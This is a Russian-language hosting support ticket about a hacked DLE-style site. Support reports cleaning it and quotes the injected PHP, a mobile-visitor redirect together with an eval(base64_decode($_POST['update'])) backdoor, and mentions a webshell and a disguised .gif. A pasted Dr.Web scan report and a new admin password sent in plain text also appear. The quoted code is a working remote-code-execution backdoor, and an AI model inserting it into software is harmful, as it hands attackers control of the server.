| Вопрос: |
Здравствуйте уважаемые. не могу зайти на сайт и в админу. не чего конкретного не показывает, я вижу только сплошной белый экран. помогите мне пожалуйста. что вы мне посоветуете. |
| Ответ: |
Здравствуйте. о каком сайт еидет речь? Уточните какие изменения на сате делались |
| Вопрос: |
сайт http://*.* изменение не какие не делались. |
| Ответ: |
ваш сайт заражен, еще с * июля или аже раньше. начните срочно менять все пароли, мы попробуем его очистить |
| Ответ: |
вирус был даже в фале /****fotosfoto_*****.gif, который совсем не файл изображений |
| Вопрос: |
хорошо, большое спасибо. уже начинаю менять пароль. |
| Вопрос: |
ага. а как я поменяю пароли я не могу зайти на сайт :( |
| Ответ: |
мы очистили файлы от вирусов, но не можем дать никакой гарантии что они не появятся т.к. не знаем как произошло заражение. меняйте пароли, все. проверяйте компьютер на вирусы. обновляйте движок. скрипт хоть лицензионный? |
| Вопрос: |
огромное спасибо. начинаю менять пароли. простите а какой скрипт? |
| Ответ: |
у вас во всех ключевых скриптах был код
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: *');
if(!empty($_POST['update'])) eval(base**_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: *');
if(!empty($_POST['update'])) eval(base**_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: *');
if(!empty($_POST['update'])) eval(base**_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: *');
if(!empty($_POST['update'])) eval(base**_decode($_POST['update']));
он же был в файле /****fotosfoto_*****.gif который не являлся файлом изображения. Запретите пользователям загружать файлы пока не устраните уязвимость |
| Вопрос: |
какой ужас. а как запретить. я наверно просто закрою всем новичкам опцию на запрет новостей, а те кто раньше выкладывал пускай выкладывают они на сайте уже * года. посмотрим что дальше будет. Евгений, огромнейшее человеческое спасибо за помощь. |
| Ответ: |
тогда сделайте бекап и скачайте |
| Вопрос: |
я поменяла пароль и наверно что то напутала, не могу зайти на сайт. |
| Ответ: |
где и что вы меняли и куда именно вы не можете зайти? |
| Вопрос: |
ладно через ** мин запрошу восстановление пароля на e*mail. (надеюсь это мелочи) сделаю бекап. |
| Ответ: |
ok
|
| Вопрос: |
Здравствуйте проблема на сайте не исправилась. при открытии любой новости появляется угроза заражения. |
| Вопрос: |
Обнаружена угрозаДоступ к веб-странице заблокирован. Показать URL-адресУгроза: HTML*.*.* вирус |
| Ответ: |
это показует вам ваш антивирус. приведите полное сообщение, т.е. наш антивирус ничего не находит на сайте |
| Вопрос: |
http://***.*.*/****/****/**/*****************************.* |
| Вопрос: |
[URL*http://*.*/**/****/****/*****************************.*.html*http://***.*.*/****/****/**/*****************************.*URL] |
| Вопрос: |
не могу зайти не на какую новость. помогите пожалуйста найти вирус и удалить. |
| Ответ: |
роверьте сайт скриптами ** или обратитесь в эту компанию для удаления вирусов, наш антивруст пока ничего не нашел, пока не гарантируем вам результат. вы пароли вчера все сменили? |
| Ответ: |
попробуйте сменить тему сайта |
| Вопрос: |
пароли все сменила. а как можно поменять тему сайта. |
| Ответ: |
в админке сайта http://*******-kak-ustanovit-shablon-dle.html *showthread.php?t=****** |
| Ответ: |
у вас на сайте был вебшелл /****addnews.php: PHP.Shell-** FOUND это означает что у хакера теперь есть полный доступ к сайту, и что он туда закачал только ему известно. антивирусы немогут найти весь код, многий код не считается антивирусами вредонсоным. мы проверили аккаунт двумя антиврусами больше ничего не нашли. файл скорее всего был загружен кем то из пользователей сайта |
| Ответ: |
так же убедитель ная просьба сообзить на каком основании вы нарушаете правила хостинга? поему у вас на сайт енаходятся торернт файлы? папка /****files - удалите все, что связано с торрентами, это строго запрещено правилами хостинга! вплоть до блокирвоки аккаунта. |
| Вопрос: |
я дала человеку сайт на раскрутку. видно он понаставил. сейчас удалю. |
| Ответ: |
этому человеку надо дать люлей, он вас подставил!! вы могли потерять сайт! в качестве компенсации пусть он вам оплатит услуги антиврусного сервиса http://www.revisium.com |
| Вопрос: |
прошло около двух лет. я его удалила из фейсбука и наверно не смогу найти. но я сейчас удаляю торрент. если вы вдруг найдете все что связано с торрентом помогите удалить пожалуйста. |
| Ответ: |
Достаточно будет удаление файлов торрентов |
| Вопрос: |
вот, вроде все удалила, только вот за место торрента осталась вот эта надпись *.php*. а где она сидит я без понятий. |
| Ответ: |
зайдиет в админку сайта в разхдел - модули. это какой то модуль |
| Вопрос: |
да, я уже заходила. но я удалила сразу все что было связано с торрентом. |
| Ответ: |
Попробуйте установить модуль заново и удалить его из админки. |
| Вопрос: |
я не умею устанавливать модули. у меня опять проблема. даже * проблемы. *)проблема. я поменяла пароль, но он не сработал, теперь для того что бы зайти на сайт мне нужно постоянно запрашивать новый пароль. *) на вашем сайте есть сохраненный мною бекап *-*.**.*******-**-***.* я хочу его вернуть. пожалуйста помогите вернуть мне этот бекап и как то сделать что бы я могла заходить на сайт без того что бы каждый раз восстанавливать пароль. пожалуйста. |
| Ответ: |
уточните о каком пароле идет речь? уточните что это за бекап? как вы его создавали? |
| Вопрос: |
пароль входа администратора.бекап который я сохранила на вашем сайте в сипанель.*-*.**.*******-**-***.* |
| Ответ: |
какой это бекап? это полный бекап или только бекап домиашней директории? бекап домашней директории абсолютно бесполезенг в ваашем случае |
| Вопрос: |
уже не помню, но думаю что полный *-*.**.*******-**-***.*.* ** **:**:** ****) |
| Ответ: |
но это зараженый бекап |
| Вопрос: |
как? что же мне делать. у меня там есть хоть один не зараженный? |
| Ответ: |
в этом бекапе к сожалению уже зараженные файлы. текущий сайт мы вам почистили, приложив немало усилий. |
| Вопрос: |
у меня опять на сайте угроза. зайти как админ я не могу из-за того что постоянно нужно запрашивать новый пароль. не знаю что мне делать, как поступить. посмотрите пожалуйста, может у вас сохранился хоть какой нибудь бекап без вирусов. |
| Вопрос: |
я тогда удалю все все бекапы. а тот который вы сможете вернуть я его сохраню. и нужно как то восстановить пароль. очень боюсь что так могут зайти на сайт. |
| Ответ: |
бекап *.**.**** самый старый. по поводу проблемы с паролем вам нужно посоветоваться на форуме поддержки движка * всполмните что вы делали , после чего появилась проблема с паролем? мы , заходя на сайт, никакой угрозы не видим. |
| Ответ: |
в чем конкретно проблема с паролем? мы только что изменили пароль на *** логин Admin пароль *** (измените в админке по своему усмотрению) несколько раз зашли в панель и на сни разу!! не попросило сменить пароль, так что проблемы с паролем не существует, или проблема не в сайт еа конкретно в вашем броузере |
| Вопрос: |
не чего страшного. мне уже все ровно, пусть будет хоть какой нибудь главное без вирусов. я удалю все бекапы и сохраню новый. с паролем не чего не делала. просто поменяла пароль как обычно, раньше сработал а сейчас нет. |
| Ответ: |
пароль пользователя Admin измене на более нормальный - nhi*yoihjliup* измените егго еще раз |
| Ответ: |
в каком смысле "ничего страшного" ? вы считаете пароль *** на сайте который взламывали это "ничего страшного" ? нет, это как раз страшно, это недопустимо впринципе. пароли всегда должнгы быть нормальными, всегда! никогда , ни при каких обстоятельствах не используйте простые пароли. мы использовали *** только для теста, а пару минут, потом изменили его на более пиемлемый nhi*yoihjliup* |
| Вопрос: |
нет, я про бекап... не чего старшого что он самый старый. |
| Ответ: |
а, н про бекап мы говорили, мы открыли его, в нем есть тот же код что мы уже чистили. смысла восстанавливать из него аккаунт нет. |
| Вопрос: |
я только что зашла под вашем паролем ****. вот я его скопирую и сохраню. |
| Ответ: |
если вы зашли, то проблемы с паролем нет. |
| Вопрос: |
это точно. уже на одну проблему меньше. |
| Ответ: |
по вирусам мы еще проверяем |
| Вопрос: |
у меня впечатления что не все в порядке с моим компом. начала кодировать а он сам отключился. пытаюсь скачать фильм из кинозала а он не качается. завтра будем чистить. |
| Вопрос: |
хорошо. я пока подожду. скажите у меня пароль не поменяется если вы сделаете бекап. |
| Ответ: |
почему пароь должен меняться от того что делается бекап? бекап просто сохраняет текущие данные |
| Вопрос: |
ну тогда отлично. пускай этот пароль и останется. |
| Ответ: |
ok
|
| Вопрос: |
на сайте все еще вирус ( |
| Ответ: |
drweb тоже ничего не нашел *online Вирусов нет
Сайта нет в базе вредоносных сайтов «Доктор Веб»
Сайт не перенаправляет на другой сайт
База знаний
Мифы об Антивирусе Dr.Web
Классификация Dr.Web именований вирусов
Типы вирусов
Вредоносные программы
Нежелательные программы
Глоссарий
Последнее обновление: ****-**-** **:**:** MSK
Всего записей в вирусной базе: *******
Вирусная пятёркаSCRIPT.Virus *.**%
Trojan.Packed.***** *.**%
Trojan.InstallMonster.*** *.**%
Trojan.MulDrop*.***** *.**%
Adware.Downware.**** *.**%
Поиск по вирусной базе
УРоЛог Dr.Web
Файлопатолог Dr.Web
Все знают, что, оказавшись на вредоносных или мошеннических сайтах, легко можно заразиться, особенно если на компьютере или мобильном устройстве не установлен антивирус. Но можно ли этого избежать? Очень просто: если сайт вызывает подозрение, проверьте его на этой странице прежде, чем нажимать на неизвестную ссылку.
Проверить ссылку (URL)
Внимание, новая угроза!
Заражение при посещении сайтов с мобильных устройств
Некоторые сайты в Интернете взломаны злоумышленниками, нацелившимися на пользователей мобильных устройств. Посетив такой сайт с компьютера, вы попадете на безобидный интернет-ресурс, а вот зайдя на него со смартфона, вы будете тайно перенаправлены на сайт с неприятным «сюрпризом». С помощью взломанных сайтов злоумышленники могут распространять различные вредоносные программы, самыми «популярными» из которых являются различные модификации Android.SmsSend. Потери жертвы зависят от того, троянец какого семейства внедрится в мобильное ваше устройство, — т. е. от его вредоносного заряда. Подробности об этом явлении читайте в нашей новости.
Вниманию пользователей мобильных устройств!
Установите на мобильное устройство антивирус Dr.Web для Android с компонентом URL-фильтр Cloud Checker. Облачный фильтр ограничит доступ к нерекомендуемым и потенциально опасным сайтам по нескольким категориям — это особенно актуально для защиты ваших детей от нежелательного интернет-контента.
URL-фильтр Cloud Checker присутствует только в полнофункциональной версии Dr.Web для Android (его нет в Dr.Web для Android Light). Для покупателей Dr.Web Security Space и Антивируса Dr.Web использование Dr.Web для Android — бесплатно.
Вниманию пользователей ПК и портативных компьютеров!
Установите Dr.Web LinkChecker
Это бесплатные расширения для проверки интернет-страниц и файлов, скачиваемых из Интернета. Установите расширение к вашему браузеру и путешествуйте по Всемирной паутине, не опасаясь вирусной атаки!
Скачайте Dr.Web LinkChecker бесплатно для
Firefox / Thunderbird Internet Explorer Opera Safari Chrome
Вход на сайт Регистрация
Акция «Dr.Web: жарче - значит выгоднее!» * месяца бесплатно = экономия **%! УЧАСТВОВАТЬ!
О компании | Новости | Прислать вирус | Онлайн-сканер | Политика конфиденциальности | Карта сайта
© «Доктор Веб»
**** — ****
«Доктор Веб» — российский производитель антивирусных средств защиты информации под маркой Dr.Web. Продукты Dr.Web разрабатываются с **** года. Компания — ключевой игрок на российском рынке программных средств обеспечения базовой потребности бизнеса — безопасности информации. «Доктор Веб» — один из немногих антивирусных вендоров в мире, владеющих собственными уникальными технологиями детектирования и лечения вредоносных программ. Антивирусная защита Dr.Web позволяет информационным системам клиентов эффективно противостоять любым, даже неизвестным угрозам.
«Доктор Веб» стал первой компанией, предложившей на российском рынке инновационную модель использования антивируса в качестве услуги, и по сей день продолжает оставаться безусловным лидером российского рынка интернет-сервисов безопасности для поставщиков ИT-услуг. Государственные сертификаты и награды, а также география пользователей Dr.Web свидетельствуют о высоком качестве продуктов, созданных талантливыми российскими программистами.
Вирусов нет
Сайта нет в базе вредоносных сайтов «Доктор Веб»
Сайт не перенаправляет на другой сайт
Проверка: */***dialog.js
Размер файла: **.** КБ
MD* файла: *******c**de***f*bca***f*b******
*/***dialog.js - Ok
Проверка: */***libs.js
Размер файла: **** байт
MD* файла: ****fa*afd****fea***d*a**ab*****
*/***libs.js - Ok
Проверка: **data**.js
Размер файла: *** байт
MD* файла: ****d***fc**c****bd*b***b*d**fd*
**data**.js - archive JS-HTML
>**data***JSFile_*[*][***] - Ok
**data**.js - Ok
Проверка: ***j?lang=rus&iv=*&r=*&is=***x***C&ip=*&tl=**&dl=***&md=*&sc=*&mc=*&mm=*&sm=*&dc=%********&rc=none&tc=%********&ac=%*****&mr=%******a*&sl=*&wp=*&oc=none&ts=***%**&as=***%**&ms=**%**&cs=&tf=Georgia&af=Arial&aa=*&mf=&cf=&n=&y=
Размер файла: **** байт
MD* файла: ***f**b**ce*b********dccb***e***
***j?lang=rus&iv=*&r=*&is=***x***C&ip=*&tl=**&dl=***&md=*&sc=*&mc=*&mm=*&sm=*&dc=%********&rc=none&tc=%********&ac=%*****&mr=%******a*&sl=*&wp=*&oc=none&ts=***%**&as=***%**&ms=**%**&cs=&tf=Georgia&af=Arial&aa=*&mf=&cf=&n=&y= - archive JS-HTML
>***j?lang=rus&iv=*&r=*&is=***x***C&ip=*&tl=**&dl=***&md=*&sc=*&mc=*&mm=*&sm=*&dc=%********&rc=none&tc=%********&ac=%*****&mr=%******a*&sl=*&wp=*&oc=none&ts=***%**&as=***%**&ms=**%**&cs=&tf=Georgia&af=Arial&aa=*&mf=&cf=&n=&y=/JSFile_*[*][****] - Ok
***j?lang=rus&iv=*&r=*&is=***x***C&ip=*&tl=**&dl=***&md=*&sc=*&mc=*&mm=*&sm=*&dc=%********&rc=none&tc=%********&ac=%*****&mr=%******a*&sl=*&wp=*&oc=none&ts=***%**&as=***%**&ms=**%**&cs=&tf=Georgia&af=Arial&aa=*&mf=&cf=&n=&y= - Ok
Проверка: *top***.jcn?*******
Размер файла: **** байт
MD* файла: **aeece*dab**b***b**a***a*a*e**d
*top***.jcn?******* - Ok
Проверка: **data**.js
Размер файла: *** байт
MD* файла: *d*e******d*cb*b*be**cd*b******d
**data**.js - archive JS-HTML
>**data***JSFile_*[*][*eb] - Ok
**data**.js - Ok
Проверка: */***highslide.js
Размер файла: **.** КБ
MD* файла: *a****e**bd**f*****b***cfc**c***
*/***highslide.js - archive JS-HTML
>*/****JSFile_*[*][**da] - Ok
*/***highslide.js - Ok
Проверка: ***radioprofusion_light.js
Размер файла: **.** КБ
MD* файла: d*e***effff*ee**cb*****b*******b
***radioprofusion_light.js - archive JS-HTML
***radioprofusion_light.js - Ok
Проверка: */***effects.js
Размер файла: **.** КБ
MD* файла: ea***dc*a********bfcbf**d***a***
*/***effects.js - Ok
Проверка: http://multifilms.org
Версия антивирусного ядра: *.*.*.****
Вирусных записей: *******
Размер файла: **.** КБ
MD* файла: **b*a**ba*c*******fba**cec*****a
http://multifilms.org - archive JS-HTML
>*JSTAG_*[**b][***] - Ok
>*JSTAG_*[d**][***] - Ok
>*JSTAG_*[**c*][**e] - Ok
>*JSTAG_*[*****][**e] - Ok
>*JSTAG_*[**b*c][*a*] - Ok
>*JSTAG_*[**dfd][***] - Ok
>*JSTAG_*[***f*][***] - Ok
>*JSTag_*[d**][**b] - Ok
>*JSTag_*[**c*][***] - Ok
>*JSTag_**[**b**][**f] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[*d] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
>*JSEvent_**[**] - Ok
http://multifilms.org - Ok
|
| Вопрос: |
это значит что у меня вирусов нет? |
| Ответ: |
это значит что мы их не находим больше, у нас нет услуг поиска вирусов и сответствующих специалистов. вам порекомендовали сервис который гарантировано может это сделать |
| Вопрос: |
тогда вы не будите делать бекап? просто я от испуга все бекапы удалила. |
| Вопрос: |
там ведь дорого. |
| Вопрос: |
у вас остался какой нибудь бекап. |
| Ответ: |
вы можете сделать бекап в панели управления в меню - резервные копии сайта, полный бекап |
| Вопрос: |
у меня постоянно выходит угроза. тогда я завтра попрошу кого нибудь почистить мне комп, может и в правду что то с ним не то. а потом сохраню бекап. Евгений спасибо огромное за помощь. |
| Ответ: |
ok
|
WordPress)